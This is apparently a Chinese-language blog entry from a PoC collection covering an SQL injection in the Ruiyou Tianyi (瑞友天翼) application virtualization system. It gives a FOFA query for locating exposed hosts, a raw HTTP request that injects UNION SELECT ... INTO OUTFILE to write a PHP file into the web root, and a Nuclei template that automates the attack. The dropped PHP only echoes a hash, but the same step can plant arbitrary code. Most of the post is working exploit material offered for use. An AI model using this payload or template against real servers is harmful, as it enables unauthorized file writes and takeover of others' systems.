Pages

Menu

Babing
Published on 2024-08-30 / 2 Visits
0
0

R1-6瑞友天翼-应用虚拟化系统-SQL

#Pocs

R1-6瑞友天翼-应用虚拟化系统-SQL

·漏洞描述:

瑞友天翼 虚拟化系统 consoleexternalapi存在sql注入漏洞。

网站图片:

image-20240625134751255

网络测绘:

fofa语法:

title=“瑞友天翼-应用虚拟化系统”

漏洞复现:

payload:

POST /ConsoleExternalApi.XGI?initParams=command_createUser__pwd_1&key=inner&sign=9252fae35ff226ec26c4d1d9566ebbde HTTP/1.1
Host: 
Accept-Encoding: gzip
Connection: close
Content-Length: 588
Content-Type: application/json
Cookie: PHPSESSID=t50ep2hj6cj7cvoitlrp7noop7; CookieLanguageName=ZH-CN; think_language=zh-CN; UserAuthtype=0
User-Agent: Mozilla/5.0

{
"account": "1' union select '<?php echo(md5(\"dBa9d\"));unlink(__FILE__);?>',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL into outfile '..\\\\..\\\\WebRoot\\\\{{filename}}.xgi'#",
"userPwd": "1"
}
      - |      
GET /{{filename}}.xgi HTTP/1.1
Host: 
User-Agent: Mozilla/5.0

效果图:
image.png
image.png

Yaml模板

id: ruiyoutianyi-xunihua-consoleexternalapi-sqli

info:
  name: ruiyoutianyi-xunihua-consoleexternalapi-sqli
  author: unknow
  severity: high
  description: 瑞友天翼 虚拟化系统 consoleexternalapi存在sql注入漏洞。
  tags:  ruiyoutianyi,sqli
  metadata:
    fofa-qeury: title="瑞友天翼-应用虚拟化系统"

variables:
  filename: '{{rand_base(7)}}'

http:
  - raw:
      - |              
        POST /ConsoleExternalApi.XGI?initParams=command_createUser__pwd_1&key=inner&sign=9252fae35ff226ec26c4d1d9566ebbde HTTP/1.1
        Host: 
        Accept-Encoding: gzip
        Connection: close
        Content-Length: 588
        Content-Type: application/json
        Cookie: PHPSESSID=t50ep2hj6cj7cvoitlrp7noop7; CookieLanguageName=ZH-CN; think_language=zh-CN; UserAuthtype=0
        User-Agent: Mozilla/5.0

        {
        "account": "1' union select '<?php echo(md5(\"dBa9d\"));unlink(__FILE__);?>',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL into outfile '..\\\\..\\\\WebRoot\\\\{{filename}}.xgi'#",
        "userPwd": "1"
        }
      - |              
        GET /{{filename}}.xgi HTTP/1.1
        Host: 
        User-Agent: Mozilla/5.0     

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code_2==200 && contains(body_2, "24ac7a1d67b5ee9e7334d3d5e146b41c") && contains(header_2, "text/html")'
R2-1任我行-协同CRM-SQL
R1-5瑞友天翼-应用虚拟化系统-RCE

Comment